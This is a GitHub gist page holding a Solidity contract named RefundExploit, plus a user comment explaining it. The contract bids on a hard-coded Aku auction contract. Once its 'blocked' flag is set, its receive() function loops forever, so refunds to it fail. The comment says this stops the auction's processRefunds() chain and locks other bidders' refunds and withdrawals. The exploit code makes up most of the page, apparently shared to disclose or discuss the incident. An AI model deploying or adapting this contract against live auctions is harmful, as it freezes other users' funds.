Created
April 22, 2022 22:05
-
-
Save except/2ece3e40b72d0bf0cbd1107aa5d06926 to your computer and use it in GitHub Desktop.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
// SPDX-License-Identifier: UNLICENSED | |
pragma solidity 0.8.13; | |
contract RefundExploit { | |
bool blocked; | |
function bid() external payable { | |
require(msg.sender == 0x0000000000000000000000000000000000000001); | |
IAku aku = IAku(0xF42c318dbfBaab0EEE040279C6a2588Fa01a961d); | |
aku.bid{value: msg.value}(1); | |
blocked = true; | |
} | |
receive() external payable { | |
if (blocked) { | |
while (true) {} | |
} else { | |
(bool success, ) = 0x0000000000000000000000000000000000000001.call{ | |
value: msg.value | |
}(""); | |
require(success); | |
} | |
} | |
function setBlocked(bool _blocked) external { | |
require(msg.sender == 0x0000000000000000000000000000000000000001); | |
blocked = _blocked; | |
} | |
} | |
interface IAku { | |
function bid(uint8) external payable; | |
} |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment
@Tung40194 The attackers objective is not to lock the Aku contract and stop others from interacting with it.
Like @except said in his previous comment, when the receivable fallback fails
if(blocked) { revert() }
it stops the chain of refunds from continuing in the parentprocessRefunds()
function. Which causes refunds and withdrawals to be stuck/locked.